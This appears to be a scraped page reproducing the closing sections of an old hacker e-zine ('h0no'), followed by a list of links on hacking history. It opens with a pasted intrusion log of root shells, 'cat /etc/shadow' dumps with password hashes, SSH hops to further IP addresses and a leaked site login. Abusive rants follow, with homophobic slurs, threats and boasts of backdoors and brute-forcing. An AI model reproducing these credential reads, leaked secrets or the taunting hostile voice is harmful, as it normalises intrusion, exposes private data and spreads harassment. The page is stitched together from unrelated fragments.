216.32.74.234 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAp2gEwMdKoxsqd69sWfdPoyd23EfsM4dKGTXCH4G2suFn04aB7FKn85kVOK6+wXYPOW/o63cegcrT32Zd9pVBeqjyio/Kuqn5kjeI6DWmOx+kgyL7v2Vr/lvsVCe3ydWGmfoUe+b2Y/lFY2Wqxx/Wn0CcCYdJOcGEXRJST5+2xEU=
216.32.87.146 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtpwg6mqVcqe01YW8dCc6u7aGyEzLkO+icBHVdMJGOnGcFrCf0V1rBs5EAcPRvd+taKlsrbxHL8gIrsgXTBBp1BklUc0IPV+8LAzlo8fwqRU+ltVkHTAXav01gvzBi3m2DsZaG/RYxVi6G+K0WvVKs8DEokyqTjvntrR7dD3KGqU=
209.67.210.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6BTnWrORMAzII76EwD3Xup8SUL8Xkdm8/NDFHNk7vw4R4tB1+72mb8xh0txbZn4vnT2VB7akJwkG3uQ7krnvlII9dHSl2/34z/LYU5VrmoOBIEVUDDoOyyCF+BG+6JBqw+d+yw7Yr7Vs2zLP/m+CGtZh3Yy+B7s8BB5sN5KAy0M=
saddened.net,72.20.16.196 ssh-dss AAAAB3NzaC1kc3MAAACBAKgo/MteQqNs4eMqwPsDhrKhzAPcdPdwP9IWHXRDs6yN0yc4X7FmrzvzmFqSaUAz25jBEVR3YTmutD90bJeLLHNsXslLtWOWVgwwxYtvGYJB+tXteHherWf+Gx0bZXtoRQYDYbWnI9VSEpXKa7avEt/wmowIB0McrUsA+hjbJJ7/AAAAFQD6Oebkz+qbtK1d9ULEnTzOkQnC5wAAAIBropUzrpvgyFJUjQIyPk66T5Wxt99Y26e8/jDRulgcsmhpZtulMfTqTjU3wR8SC4ziGUurrae39UWRUu3ZO8GbXIVa/F+ezBTXfFjXM4mpm0jZcrquK/4oFlYaN5wMrE3xlTbWXfeomTY+rUw4pw8KW+25wJu0y5i1Z/DZnH9SWwAAAIBYL6B1ie5nZi849tc9uMNvVASvvaI3HhQEzpiK74mYQVLPWuLjfafx/pjIOO0xhhkImMGuoAGHc6JoE9XLa2xV0f10frjFAgFzXBBSrrECXbwI9aXmXewhy2shUQegGByqQSZPZ/E3lOOAgvjKTOi5fW7TZuduZlxbDkLDYxJQWg==
pd@race4:~$ su –
Password:
race4:~# id
uid=0(root) gid=0(root) groups=0(root)
race4:~# cat /etc/shadow
root:$1$aDKvcOgG$UJvVF8iAhuvRRpFGopN2J0:12736:0:99999:7:::
daemon:*:12685:0:99999:7:::
bin:*:12685:0:99999:7:::
sys:*:12685:0:99999:7:::
sync:*:12685:0:99999:7:::
games:*:12685:0:99999:7:::
man:*:12685:0:99999:7:::
lp:*:12685:0:99999:7:::
mail:*:12685:0:99999:7:::
news:*:12685:0:99999:7:::
uucp:*:12685:0:99999:7:::
proxy:*:12685:0:99999:7:::
postgres:*:12685:0:99999:7:::
www-data:*:12685:0:99999:7:::
backup:*:12685:0:99999:7:::
operator:*:12685:0:99999:7:::
list:*:12685:0:99999:7:::
irc:*:12685:0:99999:7:::
gnats:*:12685:0:99999:7:::
nobody:*:12685:0:99999:7:::
sshd:!:12685:0:99999:7:::
pd:$1$phRTijeW$o9i3/DYdpmET.RjwpEKjZ0:12736:0:99999:7:::
shibob:$1$.2vhtXgt$FH3sbdKin.ssQ7ywAyxBu.:12774:0:99999:7:::
race4:~# ssh -l jugga 64.92.161.130
The authenticity of host ‘64.92.161.130 (64.92.161.130)’ can’t be established.
RSA key fingerprint is 6c:bf:ab:bb:80:73:8a:27:42:20:9f:1e:d3:86:56:22.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘64.92.161.130’ (RSA) to the list of known hosts.

Error reading response length from authentication socket.

jugga@64.92.161.130’s password:
jugga@web [~]# id
uid=32005(jugga) gid=32006(jugga) groups=32006(jugga)
jugga@web [~]# ls -al
total 360
drwx—— 5 jugga jugga 4096 Dec 12 18:52 ./
drwx–x–x 6 root root 4096 Dec 12 18:44 ../
-rw——- 1 jugga jugga 242 Dec 19 14:02 .bash_history
-rw-r–r– 1 jugga jugga 24 Dec 12 18:44 .bash_logout
-rw-r–r– 1 jugga jugga 191 Dec 12 18:44 .bash_profile
-rw-r–r– 1 jugga jugga 124 Dec 12 18:44 .bashrc
-rw-r–r– 1 jugga jugga 5543 Dec 12 18:44 .canna
-rw-r–r– 1 jugga jugga 237 Dec 12 18:44 .emacs
drwxr-xr-x 11 jugga jugga 4096 Dec 16 00:44 psybnc/
-rw-r–r– 1 jugga jugga 312188 Aug 17 2002 psyBNC2.3.1.tar.gz
drwxr-xr-x 2 jugga jugga 4096 Dec 12 18:45 public_ftp/
drwxr-xr-x 3 jugga jugga 4096 Dec 12 18:45 public_html/
jugga@web [~]# su –
Password:
-bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-bash-2.05b# ls -al
total 32
drwxr-x— 5 root root 4096 Jan 7 04:19 .
drwxr-xr-x 22 root root 4096 Nov 4 08:29 ..
-rw——- 1 root root 1407 Dec 14 01:47 .bash_history
drwxr-xr-x 4 root root 4096 Nov 2 14:36 cpanel3-skel
drwx—— 3 root root 4096 Jan 7 04:19 .cpcpan
drwxr-xr-x 2 root root 4096 Dec 14 04:20 .ncftp
-rwxr–r– 1 root root 486 Nov 5 00:02 speed_backup.sh
-rwxr-xr-x 1 root root 3200 Nov 5 00:02 speed.sh
-bash-2.05b# cat /etc/shadow
root:$1$4BJkxOXN$.4sJLf3oCJqih4tfZbir7/:12736:0:99999:7:::
bin:*:12713:0:99999:7:::
daemon:*:12713:0:99999:7:::
adm:*:12713:0:99999:7:::
Buna joejoe

Username-ul tau este : joejoe
Parola ta este : ix2HC

Te rugam sa te loghezi la http://www.gaybucuresti.ro/iol/iol/login.php

ATENTIE: Dupa logare va trebui sa iti setezi profilul si sa introduci
toate datele cerute, altfel, acesta va fi sters in 5 zile !.

Toate cele bune,
www.GayBucuresti.ro Team

ReplyForwardInvite iOL to Gmail

Atomix:
Hahaha, dont knock it till you try it! beam me up scotty so i can suck the cock of mr spock =)

Bash Histfile:
HAHA, and with that im afraid that we have reached the end of the show. Join us next time when we will be
swooping through the inboxes of narqs, whitehats , and IT Sec faggots. I’ve been Bash Histfile, Atomix has
been owned and you have been targeted for the next show, goodbye!

26.txt-~-~-~ pROjeCKt “HeY MaM!”

hOwdY my HulkAManiaCs iM baCk iN thE SqUAred CirCle eveN thOUgH eyE aM fiFTY yEaRS oLD, eYE aM bAcK tO shOW
yoU yoUNg PunKS hoW aN oLDsKEwlER piLE DriVES aLL thOSe WannABEEZ ouT thERe That wannA tAke My heAVY wEiGhT
BelT! So maNy PunkZ tOdaY thAT trY to WaLK thE wAlk, chEST oUt, hEad UP, dICK lIMp, ooOOoh No BrOTHA thAT rOLE
iS reSErvED foR mE!, thE hulKStER, thE huLKStER demANdZ rEsPECK! sO maNY punKZ tHAT waNnA tasTE thE pOweR oF
HulkAMANiA and ALl ThE HulkAMANiACZ! EsPecIALLy thOSe “HeY MaM!” dUdEZ..oooOoh BrothA eYE wILL ClotHESlYnE YoU
anD clImB uP on The ToP RopE anD LauNCH my 303lB boDy eLBoW fiRsT onTo YoUr skINNy riBCaGE , oooH yeAH bROThA!
thE HulKstER iS talKInG tO yoU proJECt “HeY MaM!” boYS, eyE wiLL thROw YoU agAINsT thEM rOpeS And makE yoU
boUnCE bAq onTo mY 24″ pytHOnS oH yeH brOTha! buT beFOrE thAT eyE waNT YoU tO traIN ,eyE waNT yoU tO lEarN,
eyE wanT yoU tO swEAt liKE a faT gIrLS thIGhs, thEN eyE wanT yoU tO lOoK iN thE miRroR anD aSk yOUr sElf
“Am eyE gOoD enOUgH to tuSslE wiTH thE hUlkSTEr,hIs HulkaManiACS and thE powER of hulKaMANiA??!!!!!!!!!!!!!?!”
anD iPh YoU thInk yoUR seLF worTHy tO stEp in thE riNG wiTh ThE huLKStER thEN the PowER of HulkAmanIA wilL
riDE alL oVEr YoU, oh yEH thE 24″ pyTHoNS wiLL grAb Hold Of yoU anD puT yoUR aSs iN thE aIR anD boDY slAM yoU
anD yoUR whOLe pROjeCKt “HeY MaM!” oNTo thE canVAS!!oh yEH brOTHER eyE cAn SeE thAT, prOjeCkT “HeY MaM”-
BODY SLAMMED by thE hULKsteR, tHE croWD wiLL gO wiLD whEN alL mY hulkAmANiaCS rUn AlL ovER yoU hAha.
So,thE hUlkStEr waNTs yOU tO thINk, hE wANtS yoU tO lisTeN, hE wanTS yOU tO taKE a GoOD lOok aT hiS 24″
pyThoNS anD prePAre YoUR seLF foR huLKaMANIA broTHa! iPh yoU tuSsLE wiTH thE huLKstER thEN yoU TusSle with
ALL mY HulkAmaNIAcz AcRoSs ThE woRLD , WE ArE aLL One biG bICEP in thiS sqUarED CirCLE ooh YeAH bROthA wE
ArE! thATS HulKAmanIA! tO aLL yoU wannABEEz ouT ThErE thE hUlkStER wAntZ yOu To gO tO yoUR mOMmA AnD AsK hER
to MaKE rOoM in Her WomB foR yoU bECaUsE thATS exACTlY wHErE thE hulKstER will puT yoU ipH yoU deCIdE to
graPplE witH mE anD mY hULkamANiACZ!

aNd NoW…..
tO aLL mY h4x0RiNg hUlkaMaNIacZ, SAy yOUr pRAyers OvER YA rOOTs , tAKe YouR ViTAmiNZ AnD prEPARE tO puLL thE
skIRTS uP oF ALLL proJECt “HeY MaM!” b1tCHES!! fOLLow thE hULKsteR anD huLKAmANIA anD witNESS thE pOWEr oF mY
24″ pyTHonS riP oFf thE NutZ oFf yoUR scRAWNy bodY!! , uSE yoUR timE poSitiVLEY and foLLoW thE reST of My
hUlkaMaNIacZ or ELse yoU wiLL haVe troUBle oN yoUR cuM staINeD handZ COS wATcHA GonnA dO whEN thE hUlkaMaNIacZ
ruN alL ovER yOU!!!!!!!!!!!!!!!!!!!!!!! iLL bE waTCHin thE evENTs oF thiS yrS suMMeR slAM BrothA, tHE hulKStER
is AlwAYS prESeNT , thE hulkStER donT TaKE nO foR an AnswER , sO whEN thE hulkSTeR sayS “eYe WanT yoUR beLT”
tHE hUlksTERexpECTS yoU tO haND it OVeR and Say ThaNK yoU to HIm, i demAND ReSPeCK, oR elSE ilL inTRoDUce You To mY 24″
pyTHONZ!! yeaaaaaaAAAAAAAAAAAAAAAAAAAAHHH bRotHHHHHAAAAAAAAAAaaaaAA!

27.txt-~-~-~ h0no h1tz th3 b0ttl3

I know kphp and C++. java is taught to me, bu it suckz real bad. 3y3
y4m n0t a p1nkh4t. grab your right one, mke your left one jelous.
buttt sqeezing. even if I am druk I can ./h0no-0dayz-f04-th3-m4mb0
y0ut ass. or atleast call up how-dark and ask him for phpbb warez.
he is so fucking tight. omfgrofl, I think I want to have his hcild.
can you belive it???? he published 0dayz for phpbb!??!!!!@ h0w c00ol.
fucking regex expression modifierz!!!@# who the fuck can remember wat
wall of them do?> haha, yo quario taco bell! challupas upreme. I
think the spanish cannot claim to be security people. They are owned
so bad by those .net blackhatz. You think your safe all you fucks..
haxorcitos>? You think your confort of loggin gon for so long without
incident meanz I dont have your password?? you think you can trust
your host? Itz nutz…… even in today we can get into like every
public wh13hat host there is. Just fuco we just ask for password and
they give it. Now we backing audit some shit or ask them for their
password and they give it. They are so stupid. I hate immunix and
all those fucking whitehat fuckz who are friends with them.. Skdor
their shit and they dont even question it. THEY DONT EVEN KNOW
BASIC PROGGRAMING PRINCICLES. OMFG, THEY ARE LAME. I think BoW is
grate, but why was it so fucking lame. They should of have u4ea write
all the articlez. fuck pluviousz, h3 i s so fucking owned in a
miliion places.. sue cina? wtf? way to go brotherhoood. I know
u43ra was hacking mad shit, but he chould of spent atleast a miniute
writting for the sake of history. And tr08ut got pbusted, what a
lamer. dooing even managed to keep clean, and he fucking supoortz
this shit. sorry, I ment some other guy from the lowlevel. maybe the
vax asm cr3w over at openvms. y0 m00gz, you know we got the bliss
memory mismanagment h000dayz. I think someone should rm -rn class101.
His dumb ass admins give away his password to like vevery one, but
everyon cannot find his login, and I think they are still vulnerable
t o that phpbb shit I said eailrer. They run winzodz so they cann0t
for k a process. HAHA. they would be so owned with ssl cmd shell and
shatter attackz. T0 CL4SS101 4ND H1S DUMB4SS H4T-SQUAT: 3Y3 W1LL 0WN
Y0U W1LTH IE 0DAYZ!@# FUK ing tablez cauze e4sy st5ck 0v4rfl0wz.
0k, 3y3 4m s0 fuckng drunk 3y3 w0uld l1ke t0 g1v3 4 sh0t 0ut t0 my
0nly r33l h4ck3r fr1n3dnz n0t 1n h0no, fuck 1y3 f0rg0t h1s n4m3.
4ny22yz. @busgtraw.oorg and t0 rfp. fuck that wh1t3hat sh1t m4n,
com3 join h0no.. we’ll own s0m3 0 f th0s3 fr5nch s3cur1ty c0nsult1ntz
wh0 qqh3r3 1n 4dm. 3y3 kno2 th3y 4r3 n4rkcz. 333y3 g0t a b1g java
pr0j3ct th4t my b0sss s4yz 1s du3 t0m022rr02, but 1y3 th1nk h3 4nd my
bu1tth0le c0w0rkz34rz c4n w41it t1ll m0nday t – 0 ge4t thate fil1az.
haha, I us3de red-rand-black trees and we werent efeven using
th4t tshit. inst3ad I ow2n3e some fuc1kng ccc.de b0xdez wi1ht th3
backd00rsz fuck1ng fr0m th4t w1fki shi1t. th3ir1r fuc1k1ngf043nsrics
te3man c0uldnt even3 n0t1c3 0ur 1n3td backd00rz 0n 2 b0xz. h0 man,
/I cnn0t b3l3f3 h0 w drunk 3y3 I get21tng, ey3 th1nk u///ki w1ll
fuc1k b0g 1n 1t’s php scr1pt. tr3ss know0z 3y3 gt0t th3 0dayhz. but
th3y ar3 c00ol s9 I dw0nt d0 4nyth1ng b3s1xdez pr0m0t3 cdc 0r
s3ccu1fity-prc0cal3z.0rg/com r0 wha4t 3fvf43r th3 fufkc 1t 1z. 3g3
w1zh g0bbl3z d1d def4c33mntz zt1lllzz. th31ir sh1t 3=was 10x bett3r
th3n fuck1ng fluffy bunnfnie shi1t. fuck th4 analo0g.org fuckqrwz..
kn0w y0u r xss sh1t d00dz. llllllllllll is your son young and
rebelious??? jhe may be a hacker!!?!? 5x mor4 dangerous than y0urr
normnaal hack3r wnannabe. more ditroibuted than the= cure for
cancerer. I thuink I have revelied that ey3 4m fr0m n0rw3y. h3r3
are a few thinngz t0 knw… 1. do nowt woory about thn1ngsz & hack.
alot! aft3r th5t d0nt rf0rg3t th4t th1ngz l1k3 brut3 f0rc3 & thn1gz
like s0c1al 3ngin33r1ng w0rk1!! 33y3y h0p3 0nly blavvckhatz read
th1s f4r 0r 3ls3 th3y mi1ght secur th3 n3tw0rkz th3t h0ldt0g3t3r th`a
c0untery. 33y3 a34m r3llay g0nig t0 pa3ss 0ut….. but1 I thn1k ey3
w1ll t3ll y0u th4t pr1m3 nubm3erz 4r3 v3ry 1mp0rt3nt!!!!! s0 4r3
c0l1z0nz w1thz ts4m3 f1lf3 s1z3…. fuc.. s0 1s def4c1ng. g0
m4ssdef4c3 hs1t f0r n0 r34s0nl. fuckk fy0u fbi. 3y3 w1lll 1ns1ght
cr1me3z fr0r n0 r43s0n. && qquyit 1ddl1ngz ande h4cc ss0mthqn..
h4ck h2n y0jr drun1k, h4ck w1hn y0uare at5 sch00l. aned even hack
wh3hn y0u ar3 1n c0urt. *(watch3z= emb4edded systt3msz = fr3m0te
c0ntr0ol.) omffgpunkonthefloor.. 3h3 cn4nnt0 b4li1f3 that th3y ar3
pl3yi1ng th3`s 3m31n3m s0ng 4ng41n! b33r g0ggl3z bl2nd! butt str33tz
n4k23ed. 0k,z s0m3dw0ne ple3sase ta3k 2wasy my c0mp3ur.

g00dbve h0no r4adeer3z!!!@

28.txt -~-~-~ 0utr0

Hello you fucking muskratz. I know after this issue you should be
fearing the ever growing h0no reach. Anyone that steps up will get
knocked the fuck down by h0no and our zone-h posse. bx talked shit,
he’s fucking dead. atomix talked shit, I doubt we’ll see his child
molested ass around much longer. Cyberarmy hatez blackhats, well we
own you. sly tried to DoS us, he getz fucking canned. And after all
this thor thinks he’s gonna remove our access to his milf site. FUCK THAT.
We own your security modules, we own your cellphone, we own your bnc, we
own your shell, we own your email, we own your fucking bind, ntp, and
dhcp. You Are Not Safe. We audit every fucking snipplet of code we
can get our grubby little handz on, we fucking check every file on your
box for bad permissions. We’ll spend a week brute forcing your
grandma’z pop3 account. Then fucking read through every single mail in
her arthritis mailing list till we find your password mentioned. Learn
to live in fear, learn to use encryption, learn to wipe data multiple
times, learn to not trust the internet, learn to fear h0no. We will
only warn you once.

This will be the last issue of h0no. All members have quit hacking
and left the internet.

thankz to darknet for the chatz, anonymous paradox for the guidence
and wisdom, and zone-h for the 0dayz!

rm -rf yourself.

rsmagtickgalacticparadiso.jpg

http://www.hacktic.nl/

http://www.tonh.net/museum/rsmaghacktic.html

hacking in progress97

The Cuckoo’s Egg – Part 1 of 6

http://youtube.com/watch?v=5NbURDW6CZY

http://www.dabo.de/hip97/hip97.html

http://neep.net/photo/hip97/

http://www.hip97.nl/users/

http://s23.org/seti23/about/about.php

hac-haha.gif

http://www.ccc.de/?language=en

http://www.securityfocus.com/news/10271

hac-ghostys.gif

hac-inux.gif

http://www.computer-dictionary-online.org/?q=pumpkin

http://www3.uark.edu/bkst/pumpkin/index.htm

http://www.eurekster.com/techcrunch/hacker/

http://myoldmac.net/FAQ/TheBlueBox-1.htm

http://johnny.ihackstuff.com/ghdb.php

hac-secure.png

http://www.sandia.gov/media/hacker.htm_